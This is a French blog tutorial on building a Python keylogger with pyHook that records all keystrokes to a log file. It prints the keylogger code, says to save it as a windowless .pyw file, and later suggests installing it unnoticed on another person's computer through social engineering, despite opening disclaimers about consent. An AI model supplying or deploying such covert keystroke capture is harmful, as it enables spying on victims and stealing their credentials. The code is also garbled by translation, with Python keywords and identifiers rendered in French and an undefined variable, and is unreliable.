PiratageProgrammationRecommandationLa technologie

Comment créer un keylogger

Avant de commencer, je dois préciser que un KEYLOGGER est illégal si son utilisation est utilisée dans des crimes, par exemple, obtenir les données et les informations d'identification de quelqu'un. Cet article est uniquement destiné à la formation et à l'utilisation académique et afin que vous compreniez son fonctionnement.

Utilisation légale du keylogger

Si vous cherchez à employer un enregistreur de frappe de contrôle parental Pour contrôler légalement la navigation de vos enfants, nous vous recommandons ce qui suit. Dans ce cas Vous devez vous assurer que vous avez le consentement de vos enfants et qu'ils savent que vous utilisez un logiciel de surveillance. Vérifiez la législation de votre pays.

Qu'est-ce qu'un enregistreur de frappe ?

Keylogger est un logiciel malveillant largement utilisé dans le monde du piratage. Ce malware nous permet d'enregistrer tout le contenu saisi sur le clavier de la personne utilisant l'appareil.

Il est très dangereux car il peut enregistrer toutes sortes d'informations d'identification, y compris les informations d'identification bancaires ou d'autres applications qui sont utilisées lorsque le logiciel est actif.

Ce logiciel malveillant est assez complexe à utiliser à distance, vous devez avoir beaucoup de connaissances à ce sujet. Mais nous allons vous apprendre créer un keylogger que vous pouvez utiliser sur votre ordinateur local afin que vous puissiez voir comment cela fonctionne de première main.

FAIS ATTENTION! S'il ne s'agit pas de votre ordinateur personnel, vous finirez par vous inscrire les informations d'identification de votre partenaire, Famille u d'autres personnes si vous le faites sur le vôtre ou s'ils ont accès à votre ordinateur. Ceci est illégal si vous n'avez pas de consentement explicite et ils doivent être informés que vous enregistrez leurs données.

Construire notre propre enregistreur de frappe nous permettra de l'utiliser sur notre ordinateur pour sauvegarder tous les enregistrements de clavier effectués. Aussi pour pouvoir s'assurer que personne n'utilise notre équipement sans autorisation préalable.

Quoi qu'il en soit, nous vous laisserons un article plus explicatif sur ce qu'est un Keylogger et son utilisation.:

Comment créer un keylogger

Pour continuer, nous aurons besoin de l'utilisation de Python 2.7, Pyhook ou Pywin32 ou nous ne pourrons pas faire fonctionner le script que nous allons créer.

Pour télécharger Python, vous pouvez le faire à partir de ce lien, cela ne prendra que quelques minutes.

La première chose que nous devrons faire pour commencer à créer un Keywlogger est d'ouvrir l'éditeur Python.

Dans notre document vierge, nous allons introduire le code suivant:

Code keylogger gratuit


import pyHook, pythoncom, sys, journalisation
# n'hésitez pas à définir le file_log sur un autre nom / emplacement de fichier

def OnKeyboardEvent (événement):
logging.basicConfig (filename = file_log, level = logging.DEBUG, format = '% (message) s')
chr (événement.Ascii)
logging.log (10, chr (événement.Ascii))
retourne True
hooks_manager = pyHook.HookManager ()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

Une fois copié et collé, ce que nous allons faire est de cliquer sur Enregistrer. Il est important que nous le sauvegardions avec l'extension .pyw. Conserver le fichier de cette façon "Keylogger.pyw".

Bien. Nous avons le Keylogger prêt à enregistrer les mouvements du clavier et à commencer à espionner l'utilisation de notre ordinateur. Avec ce code, les frappes seront enregistrées dans un fichier séparé.

Eh bien, commençons notre nouveau script. Tout ce que vous avez à faire est de double-cliquer sur le fichier et nous commencerons automatiquement à enregistrer toute l'activité.

Lorsque nous voulons désactiver le Keylogger, nous n'aurons qu'à ouvrir le gestionnaire de tâches (Contrôle + Alt + Suppr) et terminer le processus Python. Nous allons donc l'éteindre de force.

terminer python avec le gestionnaire de tâches. Poster sur la création d'un keylogger
citeia.com

Vient maintenant la partie amusante, une fois le processus terminé, nous irons chercher le fichier "keyloggeroutput.txt". Nous le trouverons dans le même répertoire où nous gardons le Keylogger. Nous allons double-cliquer dessus et….

Tachán!

Nous avons le journal de toutes les utilisations du clavier enregistré sur notre ordinateur depuis que le Keylogger est actif. Vous avez déjà appris comment créer un keylogger sur votre PC et faites certains tests.

Nous allons maintenant vous parler du cas où votre PC serait infecté par un virus de ce type par quelque moyen que ce soit. En fait, nous vous laisserons ci-dessous l'une des façons dont un Keylogger peut être implanté sur l'ordinateur d'une personne, nous vous recommandons de le lire.

Maintenant, supposons que vous soupçonniez qu'un enregistreur de frappe est installé sur votre ordinateur et que vous voyez une activité étrange, alors ne vous inquiétez pas. Nous vous avons déjà montré comment le détecter et le supprimer manuellement. Cependant, il existe plusieurs programmes et applications pour détecter et éliminer automatiquement un Keylogger de votre PC, apprenez à les connaître dans ce post que nous vous laissons ici :

Si vous êtes intéressé par ce type d'outil, laissez un commentaire pour décider lequel est le suivant.

Dans le cas où vous voudriez installer le Keylogger de manière inaperçue sur l'ordinateur de quelqu'un, cela pourrait facilement être fait via l'ingénierie sociale.

ingénierie sociale et astuces psychologiques

L'ingénierie sociale vous permet d'entrer dans la façon de penser de quelqu'un en utilisant une collection d'informations sur la victime afin de planifier et de lancer une attaque efficace contre l'utilisateur.

C'est l'une des méthodes avec lesquelles toute stratégie de piratage peut être complétée (bien qu'elle ne soit pas seulement utilisée dans le piratage)

Si vous voulez en savoir plus sur comment appliquer l'ingénierie sociale dans le piratage Je vous recommande de lire l'article suivant.

Est-il possible de pirater les humains ? ingénierie sociale

ingénierie sociale
citeia.com

Vous pouvez également télécharger la version dans PDF gratuitement. (14 pages à usage académique)

Vous pouvez également télécharger le PDF gratuitement au format Magazine pour le lire plus tard.

Couverture de livre The Art of Social Engineering
PDF TÉLÉCHARGEABLE : #1 Ingénierie sociale pour le piratage

Nous espérons que cela vous a été utile.

Cela peut vous intéresser: Comment savoir si ma messagerie a été piratée ?

commentaires 7

  1. Très bon article, c'est le premier site internet qui explique clairement comment créer le keylogger ... Merci de ne pas mettre la paille à la bête comme le font la plupart des sites internet ces derniers temps, suis-je le seul à me lasser?

    salutations

  2. Le compte Google de mon frère a été piraté et j'aimerais apprendre cet art de vérifier car cela m'attriste de le voir triste s'il vous plaît

Votre commentaire:

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont marqués avec *

Ce site utilise Akismet pour réduire les spams. Découvrez comment vos données de commentaire sont traitées.